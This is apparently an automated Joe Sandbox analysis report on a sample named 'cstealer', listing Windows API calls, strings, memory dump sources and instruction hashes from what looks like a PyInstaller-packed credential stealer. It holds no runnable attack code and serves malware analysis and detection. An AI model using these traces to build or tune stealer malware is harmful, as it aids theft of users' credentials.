  • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC67187B
  • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC671896
  • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC6718A0
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: CloseOpen$HeapSleep$AllocProcess
• String ID:
• API String ID: 1534210851-0
APIs
• FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6957FB78D,?,?,00000000,00007FF6957FB842), ref: 00007FF6957FB97E
• GetLastError.KERNEL32(?,?,?,00007FF6957FB78D,?,?,00000000,00007FF6957FB842), ref: 00007FF6957FB988
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: ChangeCloseErrorFindLastNotification
• String ID:
• API String ID: 1687624791-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                            • Opcode ID: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
                                                                                                                                                            • Instruction ID: e4dbb12017b752653f4ef07446e02491ece7920472fba95c24aa996713bde4a8
                                                                                                                                                            • Opcode Fuzzy Hash: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
                                                                                                                                                            • Instruction Fuzzy Hash: 82218D36A04A058DEB24CF64C4806AC37F1FB44B18F140636DA1D8AAC5DF38DA85D790
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
                                                                                                                                                            • Instruction ID: fb466b0dd8efc47e1c5d5f651e284a77b62f11f12e45938f7255d5ff13aa5989
                                                                                                                                                            • Opcode Fuzzy Hash: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
                                                                                                                                                            • Instruction Fuzzy Hash: FB118E21A1D68282EA70DF51A401279A2E4EF85F84F5440B5EE8D9FB86CF3DEE10A740
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
                                                                                                                                                            • Instruction ID: 4b00378f4d2a41df0e62305a4b3daa2087d70349ea3826d9b2dd01d7a1c6b256
                                                                                                                                                            • Opcode Fuzzy Hash: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
                                                                                                                                                            • Instruction Fuzzy Hash: 09219232A19A4286EB718F28E5403B977E1EB84FA4F544275EA5DC76D9DF3CDC018B00
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
                                                                                                                                                            • Instruction ID: 4e60609d50dfa7926acaa53a39979d1764730b79e3be07c68294aef8e58064d2
                                                                                                                                                            • Opcode Fuzzy Hash: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
                                                                                                                                                            • Instruction Fuzzy Hash: 9E01DB25B0875580EA24DF529900079A7D5FF45FE0F4846B1DE6D9FBDACE3CEA019300
                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6957FC196,?,?,?,00007FF6957FB35B,?,?,00000000,00007FF6957FB5F6), ref: 00007FF6957FF99D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
                                                                                                                                                            • Instruction ID: 74dc3fb8d6702ad59b0ed4d24f711480318a8950ac1870513884a8cdb095cb65
                                                                                                                                                            • Opcode Fuzzy Hash: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
                                                                                                                                                            • Instruction Fuzzy Hash: 06F04F45B1A20392FE75D76595583B552D1DF88F80F4C48B0CD0ECE3D5EE1CAE819311
                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,?,00007FF6957F1514,?,?,?,00007FF6957F2A26,?,?,?,?,?,00007FF6957F4019), ref: 00007FF6957FE3EA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
                                                                                                                                                            • Instruction ID: 050faddbb362b001ca23ad8bb36ecb7cb1180bad7f9e035af701f9bc840851a4
                                                                                                                                                            • Opcode Fuzzy Hash: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
                                                                                                                                                            • Instruction Fuzzy Hash: A4F05E04F1E29745FEB89672595867552D0CF48FA0F0902B0DD2ECD2C1DE5CED81A211
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF6957E8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6957E2A9B), ref: 00007FF6957E8E1A
                                                                                                                                                            • LoadLibraryW.KERNELBASE(?,?,00000000,00007FF6957E344E), ref: 00007FF6957E8493
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2592636585-0
                                                                                                                                                            • Opcode ID: c4c9d4e6de79a052605d9a8fca81df1ff25a4edcddc95452d00aa77451532fac
                                                                                                                                                            • Instruction ID: 6860e7ca99bb2d3807167f44aac6db9f3c13abd8c68af94bc8447097686ccd69
                                                                                                                                                            • Opcode Fuzzy Hash: c4c9d4e6de79a052605d9a8fca81df1ff25a4edcddc95452d00aa77451532fac
                                                                                                                                                            • Instruction Fuzzy Hash: 6DE08612B1425582EA289767F6454BAB191EF48FC0B489035DE0D87755DD2CD8908A00
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
• API ID: AddressProc
• String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 190572456-2208601799
• Opcode ID: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
• Instruction ID: ab217cadbe0de37901b20484ed812af9adf1e3a3f0532655926b055c4b7cd35e
• Opcode Fuzzy Hash: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
• Instruction Fuzzy Hash: F8E1ED64A1EB63A1FA78DB24B9841B523E5EF44F40F9454F6D80E897A4EF7CBD488310
APIs
• GetLastError.KERNEL32(00000000,00007FF6957E2A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E8797
• FormatMessageW.KERNEL32 ref: 00007FF6957E87C6
• WideCharToMultiByte.KERNEL32 ref: 00007FF6957E881C
  • Part of subcall function 00007FF6957E29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6957E8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E29F4
  • Part of subcall function 00007FF6957E29C0: MessageBoxW.USER32 ref: 00007FF6957E2AD0
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: ErrorLastMessage$ByteCharFormatMultiWide
• String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
• API String ID: 2920928814-2573406579
• Opcode ID: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
• Instruction ID: e37b69c1149b1483396d94e67b5fd7c2964b239be1ec4b29f46edd29efcbb3ce
• Opcode Fuzzy Hash: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
• Instruction Fuzzy Hash: 5F217131A19B4285F7749B25F8442FA63E5FF88B44F840176D94DC6AA4EF3CEA498700
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
• Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
• Instruction ID: cec64fa11753a91ce026b159f3fcefa427b63dcd7bfe1354fe4f10fb98b4c954
• Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
• Instruction Fuzzy Hash: ADB18C7221AA50CAEFB68FA9C5487A963A4FF44B84F445C16EE4D53BD4EB34C861CB40
APIs
• GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF6957E153F), ref: 00007FF6957E7BF7
  • Part of subcall function 00007FF6957E7D70: GetEnvironmentVariableW.KERNEL32(00007FF6957E39FF), ref: 00007FF6957E7DAA
  • Part of subcall function 00007FF6957E7D70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6957E7DC7
  • Part of subcall function 00007FF6957F8610: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6957F8629
• SetEnvironmentVariableW.KERNEL32 ref: 00007FF6957E7CB1
  • Part of subcall function 00007FF6957E2B10: MessageBoxW.USER32 ref: 00007FF6957E2BE5
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
• String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
• API String ID: 3752271684-1116378104
• Opcode ID: 2cfb989391866598dc899eea2a90682b7c72dc9e8b50c7915814af05e7576c00
• Instruction ID: e56b495276e51d74ecfb825ed16143f3cb3c74a37511174565fcfc2afc6f6fac
• Opcode Fuzzy Hash: 2cfb989391866598dc899eea2a90682b7c72dc9e8b50c7915814af05e7576c00
• Instruction Fuzzy Hash: 69514E11B1965255EA38EB22A9552FA62C5DF49FC0F4444B1ED0ECF7A6ED2CEE058300
APIs
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
• Instruction ID: 36179cdaedb8b2b92205a9b1a9ba55335debe86d87d0744b260b5f6e382be312
• Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
• Instruction Fuzzy Hash: AA31307220AB808AEB709FA4E8547EE73A4FB84744F44492ADB4D57BD4EF78C558CB10
APIs
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
• Instruction ID: 163eeb29c95c376ee8040dd08787b438ea137bdb36570b456613fe82b07be3ed
• Opcode Fuzzy Hash: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
• Instruction Fuzzy Hash: 84310C76609B8186EB709F60E8443FD73A4FB84B44F44407ADA4E97B99EF38DA48C710
APIs
• _get_daylight.LIBCMT ref: 00007FF695806B95
  • Part of subcall function 00007FF6958064E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6958064FC
  • Part of subcall function 00007FF6957FB700: HeapFree.KERNEL32(?,?,?,00007FF695803B72,?,?,?,00007FF695803BAF,?,?,00000000,00007FF695804075,?,?,00000000,00007FF695803FA7), ref: 00007FF6957FB716
  • Part of subcall function 00007FF6957FB700: GetLastError.KERNEL32(?,?,?,00007FF695803B72,?,?,?,00007FF695803BAF,?,?,00000000,00007FF695804075,?,?,00000000,00007FF695803FA7), ref: 00007FF6957FB720
  • Part of subcall function 00007FF6957FB6B8: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6957FB697,?,?,?,?,?,00007FF6957F38BC), ref: 00007FF6957FB6C1
  • Part of subcall function 00007FF6957FB6B8: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6957FB697,?,?,?,?,?,00007FF6957F38BC), ref: 00007FF6957FB6E6
• _get_daylight.LIBCMT ref: 00007FF695806B84
  • Part of subcall function 00007FF695806548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69580655C
• _get_daylight.LIBCMT ref: 00007FF695806DFA
• _get_daylight.LIBCMT ref: 00007FF695806E0B
• _get_daylight.LIBCMT ref: 00007FF695806E1C
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69580705C), ref: 00007FF695806E43
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
